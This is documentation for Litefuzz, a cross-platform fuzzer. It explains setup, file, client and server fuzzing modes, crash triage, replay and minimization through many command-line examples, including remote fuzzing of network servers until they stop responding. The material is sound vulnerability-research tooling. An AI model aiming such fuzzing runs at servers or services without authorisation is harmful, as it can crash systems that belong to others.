Yes, another fuzzer and one that doesn't track all that well with the current trends and conventions. Trade-offs were made to address certain requirements, those requirements being a fuzzer that works by default on multiple platforms, fuzzes both local and network targets and is very easy to use. Not trying to convince anybody of anything, but let's provide some context. Some targets require a lot of effort to integrate fuzzers such as AFL into the build chain. This is not a problem here, as this fuzzer does not require instrumentation, sacrificing the precise coverage gained by instrumentation for ease and portability. AFL also doesn't support network fuzzing out of the box, and while there are projects based on it that do, they are far from straightforward to use and usually require more code modifications and harnesses to work (similar story with Libfuzzer). It doesn't do parallel fuzzing, nor support anything like the blazing speed improvements that persistent mode can provide, so it cannot scale anywhere close to fuzzers with such capabilities. Again, this is not a state-of-the-art fuzzer. But it doesn't require source code, properly setting up a build or certain OS features. It can even fuzz some network client GUIs and interactive apps. It lives off the land in a lot of ways and many of the features such as mutators and minimization were just written from scratch.

It was designed to "just work" and effort has been put into automating the setup and installation for the few dependencies it needs. This fuzzer was written to serve a purpose, to provide value in a lot of different target scenarios and environments and, most importantly, for what all fuzzers should ultimately be judged on: the ability to find bugs. And it does find bugs. It doesn't presume there is target source code, so it can cover closed source software fairly well. It can run as part of automation with little modification, but is geared towards being fun to use for vulnerability researchers. It is however more helpful to think of it as an R&D project rather than a fully-fledged product. Also, there's no complicated setup where it's slightly broken out of the box or needs more work to get it running on modern operating systems. It's been tested working on Ubuntu Linux 20.04, Mac OS 11 and Windows 10 and comes with fully functional scripts that do just about everything for you in order to set up a ready-to-fuzz environment.

Once the setup script completes, it only takes a few minutes to get started fuzzing a ton of different targets.

how it works

Litefuzz supports three different modes: local, client and server. Local means targeting local binaries, which on Linux/Mac are launched via subprocess with automatic GDB and LLDB triage support respectively on crashes, and via WinAppDbg on Windows. Crashes are written to a local crash directory and sorted by fault type, such as read/write AVs or SIGABRT/SIGSEGV, along with the file hashes. All unique crashes are triaged as it fuzzes and this data, along with target output (as available), is also captured and placed as artifacts in the same directory. It's also possible to replay crashes with --replay and providing the crashing file. In local client mode, the input directory should contain a server greeting, response or otherwise data that a client would expect when connecting to a server. As of now only one "shot" is implemented for network fuzzing, with no complex session support. The client is launched via command line and debugged the same as when file fuzzing. A listener is set up to support this scenario; yes, it's slow and borderline manual labor, but it works. If a crash is detected, it is replayed in gdb to get the triage details. In remote client mode, this works the same except for no local debugging / crash triage. In local server mode, it's similar to local client mode, and for remote server mode it just connects to a specified target and sends mutated sample client data that the user specifies as inputs, but only a simple "can we still connect, if not then it probably crashed on the last one" triage is provided.

There are a few mutation functions written from scratch which mostly do random mutations with a random selection of inputs specified by the -i flag. For file fuzzing, just select local mode and pass it the target command line with FUZZ denoting where the app expects the filename to parse, eg. tcpdump -r FUZZ along with an input directory of "good files" to mutate. For network client fuzzing, it's similar to local fuzzing, but also provide connection specifics via -a. And if you want to fuzz servers, do server mode and provide a protocol://address:port just like for clients.

It fuzzes as fast as the target can consume the data and exit, such as is the case for most CLI applications, or for as long as you've determined it needs before the local execution or network connection times out, which can be much slower. No fancy exec or kernel tricks here. But of course if you write a harness that parses input and exits quickly, covering a specific part of the target, that helps too. But at that point, if you can get that close to the target, you're probably better off using persistent mode or similar features that other fuzzers can offer.

In short...

what it does

  • runs on linux, windows and mac and supports py2/py3
  • fuzzes CLI/GUI binaries that read from files/stdin
  • fuzzes network clients and servers, open source or proprietary, available to debug locally or remote
  • diffs, minimization, replay, sorting and auto-triaging of crashes
  • misc stuff like TLS support, golang binary fuzzing and some extras for Mac
  • mutates input with various built-in mutators + pyradamsa (Linux)

what it doesn't do

  • native instrumentation
  • scale with concurrent jobs
  • complex session fuzzing
  • remote client and server monitoring (only basic checks eg. connect)

support

Primarily tested on Ubuntu Linux 20.04 (lightly tested on 21.04), Windows 10 and Mac OS 11. The fuzzer and setup scripts may work on slightly older or newer versions of these operating systems as well, but the majority of research, testing and development occurred in these environments. Python3 is supported and an effort was made to make the code compatible with Python2 as well, as it's necessary for fuzzing on Windows via WinAppDbg. Platform testing primarily occurred on Intel-based hardware, but things seem to mostly work on Apple's M1 platform too (notable exceptions being that on Linux the exploitable plugin for GDB probably isn't supported, nor is Pyradamsa). There are also setup scripts in setup/ to automate most or all of the tasks and dependency installation. It can generally fuzz native binaries on each platform, which are often compiled in C/C++, but it can also catch crashes for Golang binaries as well (experimental).

python versions

Python3 is supported for Linux and Mac while Python2 is required for Windows.

Why Py3 for Linux and Mac? Pyautogui, Pyradamsa (Linux only), better socket support on Mac.

Why Py2 for Windows? Winappdbg requires Py2.

linux

GDB for debugging and exploitable for crash triage. If it's OSS, you can build and instrument the target with sanitizers and such; otherwise there are some memory debuggers we can just load at runtime.

This installation along with the python dependencies and other helpful stuff has been automated with setup/linux.sh. Recommended OS is Ubuntu 20.04 as that is where the majority of testing occurred.

mac

Instead of gdb, we use lldb for debugging on OS X as it's included with the XCode command line tools. Being an admin or in the developer group should let you use lldb, but this behavior may differ across environments and versions and you may need to run it with sudo privileges if all else fails.

The one thing you'll manually need to do is turn off SIP (in recovery, via cmd+R or use vmware fusion hacks). Otherwise, auto-triage will fail when fuzzing on Tim Apple's OS.

Almost all of the setup has been automated with the setup/mac.sh script, so you can just run it for a quick start.

windows

WinAppDbg is used for debugging on Windows with the slight caveat that stdin fuzzing isn't supported.

Like the automated setups for the other operating systems, chocolatey helps to automate package installation on windows. Run setup/windows.bat in the litefuzz root directory as Administrator to automate the installations. It will install debugging tools and other dependencies to make things run smoothly.

targets

This is a list of the types of targets that have been tested and are generally supported.

  • Local CLI/GUI apps that parse file formats or stdin

    • debug support
  • Local CLI/GUI network client that parses server responses

    • debug support for CLIs
    • limited debug support for GUIs
  • Local CLI network server that parses client requests

    • debug support (caveat: must be able to run as a standalone executable, otherwise can be treated as remote)
  • Local GUI network server that parses client requests

    • theoretically supported, untested
  • Remote CLI/GUI network client that parses server responses

    • no debug support
  • Remote CLI/GUI network server that parses client requests

    • no debug support
    • exception being on Mac and using attach or reportcrash features

Again, the fuzzer can run on and support local apps, clients and servers on Linux, Mac and Windows and of course can fuzz remote stuff independent of the target platform.

triage

  • Local CLI/GUI apps that parse file formats or stdin

    • run app, catch signals, repro by running it again inside a debugger with the crasher
  • Local CLI/GUI network client that parses server responses

    • run app, catch signals, repro by running it again inside a debugger with the crasher
  • Local GUI/CLI network server that parses client requests

    • run app in debugger, catch signals, repro by running it again inside a debugger with the crasher
  • Remote CLI/GUI network client that parses server responses

    • no visibility, collect crashes from the remote side
    • can manually write supporting scripts to aid in triage
  • Remote CLI/GUI network server that parses client requests

    • no visibility, collect crashes from the remote side
    • can manually write supporting scripts to aid in triage
    • exception on Mac are the attach and reportcrash options, which can be used to enable some triage capabilities

getting started

Most of the setup across platforms has been automated with the scripts in the setup directory. Simply run those from the litefuzz root and it should save you a lot of time and help enable some of what's needed for automated deployments. It's useful to use a VM to setup a clean OS and fuzzing environment as among other things its snapshot capabilities come in handy.

See INSTALL.md for details.

tests

unit tests

There are a few simple unit and functional tests to get some coverage for Litefuzz, but it is not meant to be complete.

py2> pytest
py3> python3 -m pytest

This will run pytest for test_litefuzz.py in the main directory and provide PASS/FAIL results once the test run is finished.

crashing app tests

A few examples of buggy apps for testing crash and triage capabilities on the different platforms can be found in the test folder.

  • (a) null pointer dereference
  • (b) divide-by-zero
  • (c) heap overflow
  • (d-gui) format string bug in a GUI
  • (e) buffer overflow in client
  • (f) buffer overflow in server

They are automatically built during setup and you can run them on the command line, in a debugger or use them to test as fuzzing targets. If running on Windows command line, check Event Viewer -> Windows Logs -> Application to see crashes.

options

There are a ton of different options and features to take advantage of various target scenarios. The following is a brief explanation and some examples to help understand how to use them.

crash directory

-o lets you specify a crash directory other than the default, which is crashes/ in the local path. One can use this to manage crash folders for several concurrent fuzzing runs for different apps at the same time.

insulate mode

-u insulates the target application from the normal fuzzing process, eg. execing or sending packets over and over and checking for crashes. Instead, this mode was made for interactive client applications, eg. Postman, where you can script inside the application to repeat connections for client fuzzing. The target is run inside of a debugger, the fuzzer is paused to give the user time to click a few buttons or set the target's config to make it run automatically, the user resumes, and now you are fuzzing interactive network clients.

litefuzz -lk -c "/snap/postman/140/usr/share/Postman/_Postman" -i input/http_responses -a tcp://localhost:8080 -u -n 100000 -z

Insulate mode + refresh can be used for interactive clients, eg. run FileZilla in a debugger, but keep hitting F5 to make it reconnect to the server for each new iteration. Also, local CLI/GUI servers being fuzzed are started and run only once inside a debugger to make the process a little more efficient.

--key also allows you to send keys while fuzzing interactive targets, such as fuzzing FileZilla's parsing of FTP server responses by sending "refresh connection" with F5.

litefuzz -lk -c "filezilla" -a tcp://localhost:2121 -i input/ftp/filezilla -u -pp --key "F5" -n 100 -z glibc

note: insulate mode has only been tested working on Linux and is not supported on Windows.

timeout

-x secs allows you to specify a timeout. In practice, this is more like "approx how long between iterations" for CLI targets and an actual timeout for GUIs.
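For instance, a local file-fuzzing run with a three-second timeout between iterations might look like this (the target command line and input directory are hypothetical):

litefuzz -l -c "viewer FUZZ" -i input/images -x 3 -n 1000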

mutators

--mutator N specifies which mutator to use for fuzzing. If the option is not provided, a random choice from the list of available mutators is chosen for each fuzzing iteration. These mutators were written from scratch (with the exception of Radamsa of course). And while they have been extensively tested and have held up pretty well during millions of iterations, they may have subtle bugs from time to time, but generally this should not affect functionality.

FLIP_MUTATOR = 1
HIGHLOW_MUTATOR = 2
INSERT_MUTATOR = 3
REMOVE_MUTATOR = 4
CARVE_MUTATOR = 5
OVERWRITE_MUTATOR = 6
RADAMSA_MUTATOR = 7

note: Radamsa mutator is only available on Linux (+ Py3).
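As an illustration, explicitly selecting the Radamsa mutator for a local run (the tcpdump target is borrowed from the file-fuzzing example earlier in this write-up; the input directory is hypothetical, and this assumes a Linux + Py3 environment where Pyradamsa is available):

litefuzz -l -c "tcpdump -r FUZZ" -i input/pcaps --mutator 7 -n 50000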

ReportCrash

--reportcrash is mac-specific. Instead of using the default triage system, it instructs the fuzzer to monitor the ReportCrash directory for crash logs for the target process. ReportCrash must be enabled on OS X (default enabled, but usually disabled for normal fuzzing). This feature is useful in scenarios where we can't run the target in a debugger to generate and triage our own crash logs, but we can utilize this core functionality on the operating system to gain visibility.

note: consider this feature experimental as we're relying on a few moving parts and components we don't directly control within the core MacOS system. ReportCrash may eventually stop working properly and responding after fuzzing for a while even after attempting to unload and reload it, so one can try rebooting the machine or resetting the snapshot to get it back in good shape.

sudo launchctl unload -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist
sudo launchctl load -w /System/Library/LaunchAgents/com.apple.ReportCrash.plist
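A hypothetical invocation, borrowing the Books example used later in this document and assuming the process name to monitor is Books, might look like:

litefuzz -l -c "/System/Applications/Books.app/Contents/MacOS/Books FUZZ" -i test-epub --reportcrash Books -x 8 -n 100000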

pause

Hit ctrl+c to pause the fuzzing process; choose y to resume or n to stop. This feature works ok across platforms, but may be less reliable when fuzzing GUI apps.

reusing crashes for variant finding

-e enables reuse mode. This means that if any crashes were found during the fuzzing run, they will be used as inputs for a second round of fuzzing which can help shake out even more bugs. Combine with -z for -ez bugs! Da-duph.

The following example fuzzes antiword for 100000 iterations and then starts another run with the same iteration count and options, reusing the crashes as input to try and grind out even more bugs.

litefuzz -l -c "antiword FUZZ" -i docs -n 100000 -ez

(or one could manually copy crashes over to an input directory to directly control the iterations for the reuse run)

litefuzz -l -c "antiword FUZZ" -i docs-crashes -n 500000 -z

note: this mode is supported for local apps only.

memory debugging helpers

-z enables Electric Fence (or glibc malloc debugging as a fallback) on Linux, Guard Malloc on Mac and PageHeap on Windows. Also, -zz can be used to disable PageHeap after enabling it for an application. If you just want to flip it on/off without starting the fuzzer, leave out the -i flag. During Windows setup, gsudo is installed and can be used to run elevated commands on the command line, such as turning on PageHeap for targets.

sudo litefuzz -l -c "notepad FUZZ" -i texts/files -z

sudo litefuzz -l -c "notepad FUZZ" -zz

On Linux, specific helpers can be chosen. For example, instead of only using glibc malloc debugging as a fallback, it can be selected explicitly.

litefuzz -l -c "geany FUZZ" -i texts/codes -z glibc

The default Electric Fence malloc debugger is great, but it doesn't work with all targets. You can test the target with EF and if it crashes, select the glibc helper instead.

checking live target output

If fuzzing local apps on Linux or Mac, you can cat /tmp/litefuzz/RUN_ID/fuzz.out to check what the latest stdout from the target was. RUN_ID is shown in the STATS information area when fuzzing begins. In the event that a crash occurs, stdout is also captured in the crashes directory as the .out file. Global stdout/stderr also goes to /tmp/litefuzz/out for debugging purposes for all fuzzing targets, with the exception of insulated or local server modes, whose debugger output goes to /tmp/litefuzz/RUN_ID/out. Winappdbg doesn't natively support capturing stdout of targets (AFAIK), so this artifact is not available on Windows.

client and server modes

If the server can be run locally simply by executing the binary (with or without some flags and configuration), you can pass its command line with -c and it will be started, fuzzed and killed with a new execution every iteration. The idea here is trading speed for the ability to avoid those annoying bugs which only trigger after the target's memory is in a "certain state", and which can lead to false positives. Same deal with locally fuzzing network clients. It even supports TLS connections, generating certificates for you on the fly (letting the user provide a client cert when fuzzing a server that requires one, and fuzzing the certificate itself, are other ideas here). Debugging support is not provided by Litefuzz when fuzzing remote clients and servers, so setup on the remote end is up to the user. For servers, we simply check if the server stopped responding and note the previous payload as the crasher. This works fine for TCP connections, but we don't quite have this luxury for UDP services, so monitoring the remote server is left up to either the ReportCrash feature (available on Mac), running the target in a debugger (via local server mode or manually) or crafting custom supporting scripts. Also, some servers may auto-restart or otherwise recover after crashing, but there may be signs of this in the logs or other artifacts on the filesystem which can be parsed by supporting scripts written for a particular target.

local network examples

litefuzz -lk -c "wget http://localhost:8080" -a tcp://localhost:8080 -i input/http -z

litefuzz -lk -c "curl -k https://localhost:8080" -a tcp://localhost:8080 -i input/http -z

litefuzz -lk -c "curl -k https://localhost:8080" -a tcp://localhost:8080 -i input/http -o crashes/curl --tls -n 100000 -z

(open Wireshark and capture the response from a daemon, right click Simple Network Management Protocol -> Export Packet Bytes -> resp.bin)

litefuzz -lk -c "snmpwalk -v 2c -c public localhost:1616 1.3.6.1.2.1.1.1" -a udp://localhost:1616 -i input/snmp/resp.bin -n 1 -d -x 3

litefuzz -ls -c "./sc_serv shoutcast.conf" -a localhost:8000 -i input/shouts -z

litefuzz -ls -c "snmpd" -i input/snmp -a udp://localhost:161 -z

quick notes

  • UDP sockets can act a little strange on Mac + Py2, so only Mac + Py3 has been tested and supported
  • Local network client fuzzing on Windows can be buggy and should be considered experimental at this time

remote network examples

Fuzzing remote clients and servers is a bit more challenging: we have no local debugging and rely on catching a halt in the interaction between the two parties over the network to detect crashes. Also, since we are assumedly blind to what's happening on the other end, fuzzing ends when the client or server stops responding and must be restarted manually once the client or server is restored to a normal (uncrashed) state, unless the user has set up scripts on the remote side to manage this process. Again, UDP complicates this further: even sending a test packet to see if there's a listening service on a UDP port doesn't guarantee a reply. So it's possible to remotely fuzz network clients and servers, but there's a trade-off in visibility.

client

while :; do echo "user test\rpass test\rls\rbye\r" | ftp localhost 2121; sleep 1; done

litefuzz -k -i input/ftp/test -a tcp://localhost:2121 -pp -n 100

Client mode is more finicky here because it's hard to tell whether a client has actually crashed (and is therefore not reconnecting) or whether the send/recv dance is just off, as different clients can handle connections however they like. Also note that this is just an example; remote client fuzzing is tricky by nature and should be considered somewhat experimental.

server

The pros and cons of fuzzing a server locally or remotely can help you decide how to approach a target when both options are available. Basically, fuzzing with the server in a debugger is going to be slower, but you'll get crash logs with automatic triage, whereas fuzzing the server in remote mode (even when pointing it at localhost) will be much faster on average, but you lose the high-visibility, debugger-based triage capabilities. Remote mode does, however, give you time to manually restart the server after each crash to keep going before the run exits (TCP servers only; this feature does not support UDP-based servers).

Shoutcast

./sc_serv ...

litefuzz -s -a localhost:8000 -i input/shouts -n 10000

SSHesame

sshesame

litefuzz -s -a tcp://target:2022 -i input/ssh-server -p -n 1000000 -x 0.05

FTP

litefuzz -s -a tcp://target:21 -i input/ftp/req.txt -pp -n 1000

DNS

coredns -dns.port 10000

litefuzz -ls -c "coredns -dns.port 10000" -a udp://localhost:10000 -i dns-req/1.bin -o crashes/coredns -n 10000

or

litefuzz -s -a udp://localhost:10000 -i dns-req/1.bin -o crashes/coredns -n 10000

TLS

litefuzz -s -a tcp://hostname:8080 -i input/http --tls -n 10000

...
@ 48/10000 (1 crashes, 0 duplicates, ~7:13:18 remaining)

[!] check target, sleeping for 60 seconds before attempting to continue fuzzing...

note: the default remote server mode delays between fuzzing iterations make fuzzing sessions run reliably, but are pretty slow; this is the safe default, but one can use -x to set very fast timeouts between sessions (as shown above) if the target is OK with parsing packets very quickly, unofficially nicknamed "2fast2furious" mode

For more on session-based protocols (such as FTP or SSH), see Multiple modes.

multiple data exchange modes

-p is for multiple binary data mode, which allows one to supply sequential inputs, eg. an input/ssh directory containing files named "1", "2", "3", etc for each packet in the session to fuzz. This is meant to enable fuzzing of binary-based protocol implementations, such as an SSH client.

$ ls input/ssh
1  2  3  4

xxd input/ssh/2 | head

00000000: 0000 041c 0a14 56ff 1297 dcf4 672d d5c9  ......V.....g-..
00000010: d0ab a781 dfcb 0000 00e6 6375 7276 6532 ..........curve2
00000020: 3535 3139 2d73 6861 3235 362c 6375 7276 5519-sha256,curv
00000030: 6532 3535 3139 2d73 6861 3235 3640 6c69 [email protected]
00000040: 6273 7368 2e6f 7267 2c65 6364 682d 7368 bssh.org,ecdh-sh
00000050: 6132 2d6e 6973 7470 3235 362c 6563 6468 a2-nistp256,ecdh
00000060: 2d73 6861 322d 6e69 7374 7033 3834 2c65 -sha2-nistp384,e
00000070: 6364 682d 7368 6132 2d6e 6973 7470 3532 cdh-sha2-nistp52
00000080: 312c 6469 6666 6965 2d68 656c 6c6d 616e 1,diffie-hellman
00000090: 2d67 726f 7570 2d65 7863 6861 6e67 652d -group-exchange-

Each packet is consumed into an array, a random index is mutated and replayed to fuzz the target.
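Conceptually, that per-iteration loop looks something like the sketch below; this is a simplified illustration of the idea, not Litefuzz's actual implementation, and the single byte-flip mutation, host and port are placeholders.

import os
import random
import socket

def load_session(directory):
    # packets are files named "1", "2", "3", ... in send order
    packets = []
    for name in sorted(os.listdir(directory), key=int):
        with open(os.path.join(directory, name), "rb") as f:
            packets.append(f.read())
    return packets

def fuzz_one_iteration(packets, host, port):
    # pick one packet at random and mutate a single byte in it
    mutated = list(packets)
    index = random.randrange(len(mutated))
    data = bytearray(mutated[index])
    if data:
        data[random.randrange(len(data))] = random.randrange(256)
    mutated[index] = bytes(data)
    # replay the whole session (here as a client; Litefuzz can also play the server side)
    with socket.create_connection((host, port)) as sock:
        for packet in mutated:
            sock.sendall(packet)
            sock.recv(4096)  # simplified: read whatever the peer sends back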

litefuzz -lk -c "ssh -T [email protected] -p 2222" -a tcp://localhost:2222 -i input/ssh -o crashes/ssh -p -n 250000 -z glibc

And you can check on the target's output for the latest iteration.

cat /tmp/litefuzz/out
kex_input_kexinit: discard proposal: string is too large
ssh_dispatch_run_fatal: Connection to 127.0.0.1 port 2222: string is too large

... and others like

ssh_dispatch_run_fatal: Connection to 127.0.0.1 port 2222: unknown or unsupported key type

ssh_askpass: exec(/usr/bin/ssh-askpass): No such file or directory
Host key verification failed.

Bad packet length 1869636974.
ssh_dispatch_run_fatal: Connection to 127.0.0.1 port 2222: message authentication code incorrect

-pp asks the fuzzer to check inputs for line breaks and if detected, treat those as multiple requests / responses. This is useful for simple network protocol fuzzing for mostly string-based protocol implementations, eg. ftp clients.

cat input/ftp/test
220 ProFTPD Server (Debian) [::ffff:localhost]
331 Password required for user
230 User user logged in
215 UNIX Type: L8
221 Goodbye

The fuzzer breaks each line into its own FTP response to try and fuzz a client's handling of a session. There's no guarantee, however, that a client will "behave" and not act in ways that prevent a session from completing properly, so some trial and error plus fine-tuning of session test cases while running Wireshark can be helpful for understanding the differences in interaction between targets.

litefuzz -lk -c "ftp localhost 2121" -a tcp://localhost:2121 -i input/ftp -o crashes/ftp -n 100000 -pp -z

This can also be combined with -u for insulating GUI network targets like FileZilla.

litefuzz -lk -c "filezilla" -a tcp://localhost:2121 -i input/ftp.resp -n 100000 -u -pp -z glibc

attaching to a process

If the target spawns a new process on connection, one can specify the name of a process (or pid) to attach to after a connection has been established to the server. This is handy in cases where eg. launchd is listening on a port and only launches the handling process once a client is connected. This is one feature that sort of blurs the line between local and remote fuzzing, as technically the fuzzer is in remote mode, yet we specify the target address as localhost and ask it to attach to a process.

./litefuzz.py -s -a tcp://localhost:8080 -i input/shareserv -p --attach ShareServ -x 1 -n 100000

note: currently this feature is only supported on Mac (LLDB) and for network fuzzing, although if implemented it should work fine for Linux (GDB) too.

crash artifacts

When a crash is encountered during fuzzing, it is replayed in a debugger to produce debug artifacts and bucketing information. The information varies from platform to platform, but generally a text file is produced with a backtrace, register information, !exploitable-type output (where available) and other basic information.

Memory dumps can be enabled on Windows by passing --memdump or disabled with --nomemdump, similar to how malloc debuggers are controlled via -z and -zz respectively. If enabled, the dump will also be loaded in the console debugger (cdb) and the !analyze -v crash analysis output is captured in an additional memory dump crash analysis log. Winappdbg already provides the !exploitable-type analysis that we get in the initial crash triage, so we just do !analyze here.

litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --memdump

or to disable memory dumps for an application

litefuzz -l -c "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --nomemdump

In addition to auto-crash triage, binary/string diffs (as appropriate), target stdout (platform/target dependent) and, of course, repro files are also produced.

For local fuzzing, artifacts generally include diffs, stdout (linux/mac only), repro file and the crash log and information file.

$ ls crashes/latex
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.diff
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.diffs
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.out
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.tex
PROBABLY_EXPLOITABLE_SIGSEGV_XXXX5556XXXX_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.txt

On Windows, if memory dumps are enabled, a dump file will be generated and additional triage information will be written to an additional crash analysis log.

C:\litefuzz\crashes> dir
app.exe.14299_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.dmp
app.exe.14299_YYYYa39f3fd719e170234435a1185ee9e596c54e79092c72ef241eb7a41cYYYY.log
....

For remote fuzzing, artifacts may vary depending on the options chosen, but often include diffs, a repro file and/or repro file directory (if the input is a session with multiple packets), the previous fuzzing iteration's repro (to avoid losing a bug in case it's actually the crasher, as remote fuzzing has its challenges) and a crash log or brief information file.

ls crashes/serverd
REMOTE_SERVER_testbox.1_NNNN_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY
REMOTE_SERVER_testbox.1_NNNN_PREV_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY
UNKNOWN_XXXX2040YYYY_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY.diff
UNKNOWN_XXXX2040YYYY_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY.diffs
UNKNOWN_XXXX2040YYYY_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY.txt
UNKNOWN_XXXX2040YYYY_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY.zz

ls crashes/serverd/REMOTE_SERVER_localhost_NNNN_XXXX9c3f3660aaa76f70515f120298f581adfa9caa8dcaba0f25a2bc0b78YYYY
REMOTE_SERVER_testbox.1_NNNN_1.zz REMOTE_SERVER_localhost_NNNN_2.zz
REMOTE_SERVER_testbox.1_NNNN_3.zz REMOTE_SERVER_localhost_NNNN_4.zz

golang

Apparently when Golang binaries crash, they may not actually go down with a traditional SIGSEGV, even if that's what they say in the panic info (Linux tested). They may instead crash with return code 2. So I guess that's what we're going with :) I'm sure there's a better explanation out there for how this works and edge cases around it, but one can use --golang to try and catch crashes in golang binaries on Linux.

litefuzz -l -c "evernote2md FUZZ" -i input/enex -o crashes/evernote2md --golang -n 100000

repros

Crashing files are kept in the crashes/ directory (or otherwise specified by -o flag) along with diffs and crash info.

-r and passing a repro file (or directory) with the appropriate target command line / address setup will try to reproduce the crash locally or remotely.

local example

litefuzz -l -c "latex2rtf FUZZ" -r crashes/latex2rtf/test.tex -z

local network example

./litefuzz -ls -c "./sc_serv shoutcast.conf" -a tcp://localhost:8000 -r crashes/crash.raw

remote network example

litefuzz -s -a tcp://host:8000 -r crashes/crash.raw

remote network example (multiple packets)

litefuzz -s -a tcp://localhost:22 -r repro/dir/here

remove file

Some targets take a static output file location as part of their command line and may throw an error if that file already exists. --rmfile is an option for getting around this while fuzzing: after each fuzzing iteration, it removes the file that was generated as part of how the target functions.

litefuzz -l -c "hdiutil makehybrid -o /tmp/test.iso -joliet -iso FUZZ" -i input/dmg --rmfile /tmp/test.iso -n 500000 -ez

minimization

Minimizing crashing files is an interesting activity. You can even infer how a target is parsing data by comparing a repro with a minimized version.

-m and passing a repro file with the target command line or address setup will attempt to generate a minimized version of the repro which still crashes the target, but is smaller and free of bytes that aren't necessary. During this minimization journey, it may even find new crashes. Only local modes are supported, but this still includes local client and server modes, so you can minimize network crashes as long as we can debug them locally.

For example, this request is the original repro file.

GET /admin.cgi?pass=changeme&mode=debug&option=donotcrash HTTP/1.1
Host: localhost:8000
Connection: keep-alive
Authorization: Basic YWRtaW46Y2hhbmdlbWU=
Referer: http://localhost:8000/admin.cgi?mode=debug

Now take a look at its minimized version.

GET /admin.cgi?mode=debug&option=a
Authorization:s YWRtaW46Y2hhbmdlbWU
Referer:admin.cgi

One can make some guesses about what the target is looking for and even the root cause of the crash.

  1. The request line is the most important part
  2. option= can probably be a lot of different things
  3. The Host and Connection headers aren't necessary
  4. Authorization header parsing is just looking for the second token and doesn't care if it's explicitly presenting Basic auth
  5. Referer is necessary, but only admin.cgi and not the host or URL

Anything else? Here's a bonus: passing a valid password isn't needed if the Authorization creds are correct, and vice versa. Since the minimization is linear and starts at the beginning of the file and goes until it hits the end, we'd only produce a repro which authenticates this way, while still discovering there are actually two options!

-mm enables supermin mode. This is slower, but it will try and minimize over and over again until there are no more unnecessary bytes to remove.

For fun, we can modify the repro and run it through supermin to get the maximally minimized version.

GET /admin.cgi?pass=changeme&mode=debug&option=a
Referer:admin.cgi

minimization examples

litefuzz -l -c "latex2rtf FUZZ" -m test.tex -z

litefuzz -ls -c "./sc_serv shoutcast.conf" -a "tcp://localhost:8000" -m repro.http

supermin example

litefuzz -l -c "latex2rtf FUZZ" -mm crashes/latex2rtf/test.tex -z
...
[+] starting minimization

@ 582/582 (1 new crashes, 1145 -> 582 bytes, ~0:00:00 remaining)

[+] reduced crash @ pc=55555556c141 -> pc=55555557c57d to 582 bytes

[+] supermin activated, continuing...

@ 299/299 (1 new crashes, 582 -> 300 bytes, ~0:00:00 remaining)

[+] reduced crash @ pc=55555557c57d to 300 bytes
...
[+] reduced crash @ pc=555555562170 to 17 bytes

@ 17/17 (2 new crashes, 17 -> 17 bytes, ~0:00:00 remaining)

[+] achieved maximum minimization @ 17 bytes (test.min.tex)

[RESULTS]
completed (17) iterations with 2 new crashes found

command

--cmd allows a user to specify a command to run after each iteration. This can be used to clean up after certain operations that would otherwise take up resources on the system.

litefuzz -l -c "/System/Library/CoreServices/DiskImageMounter.app/Contents/MacOS/DiskImageMounter FUZZ" -i input/dmg --cmd "umount /Volumes/test.dir" --click -x 5 -n 100000 -ez

examples

local app

quick look

litefuzz -l -c "latex2rtf FUZZ" -i input/tex -o crashes/latex2rtf -x 1 -n 100
--========================--
--======| litefuzz |======--
--========================--

[STATS]
run id: 3516
cmdline: latex2rtf FUZZ
crash dir: crashes/latex2rtf
input dir: input/tex
inputs: 4
iterations: 100
mutator: random(mutators)

@ 100/100 (1 crashes, 4 duplicates, ~0:00:00 remaining)

[RESULTS]
> completed (100) iterations with (1) unique crashes and 4 dups
>> check crashes/latex2rtf dir for more details

enumerating file handlers on Ubuntu

$ cat /usr/share/applications/defaults.list
[Default Applications]
application/csv=libreoffice-calc.desktop
application/excel=libreoffice-calc.desktop
application/msexcel=libreoffice-calc.desktop
application/msword=libreoffice-writer.desktop
application/ogg=rhythmbox.desktop
application/oxps=org.gnome.Evince.desktop
application/postscript=org.gnome.Evince.desktop
....

fuzz the local tcpdump's pcap parsing (Linux)

litefuzz -l -c "tcpdump -r FUZZ" -i test-pcaps

fuzz Evince document reader (Linux GUI)

litefuzz -l -c "evince FUZZ" -i input/oxps -x 1 -n 10000

fuzz antiword (oldie but good test app :) (Linux)

litefuzz -l -c "antiword FUZZ" -i input/doc -ez

note: you can (and probably should) pass -z to enable Electric Fence (or fallback to glibc's feature) for heap error checking

enumerating file handlers on OS X

swda can enumerate file handlers on Mac.

$ ./swda getUTIs | grep -Ev "No application set"
com.adobe.encapsulated-postscript /System/Applications/Preview.app
com.adobe.flash.video /System/Applications/QuickTime Player.app
com.adobe.pdf /System/Applications/Preview.app
com.adobe.photoshop-image /System/Applications/Preview.app
....

fuzz gpg decryption via stdin with heap error checking (Mac)

litefuzz -l -c "gpg --decrypt" -i test-gpg -o crashes-gpg -z

fuzz Books app (Mac GUI)

litefuzz -l -c "/System/Applications/Books.app/Contents/MacOS/Books FUZZ" -i test-epub -t "/Users/test/Library/Containers/com.apple.iBooksX/Data" -x 8 -n 100000 -z

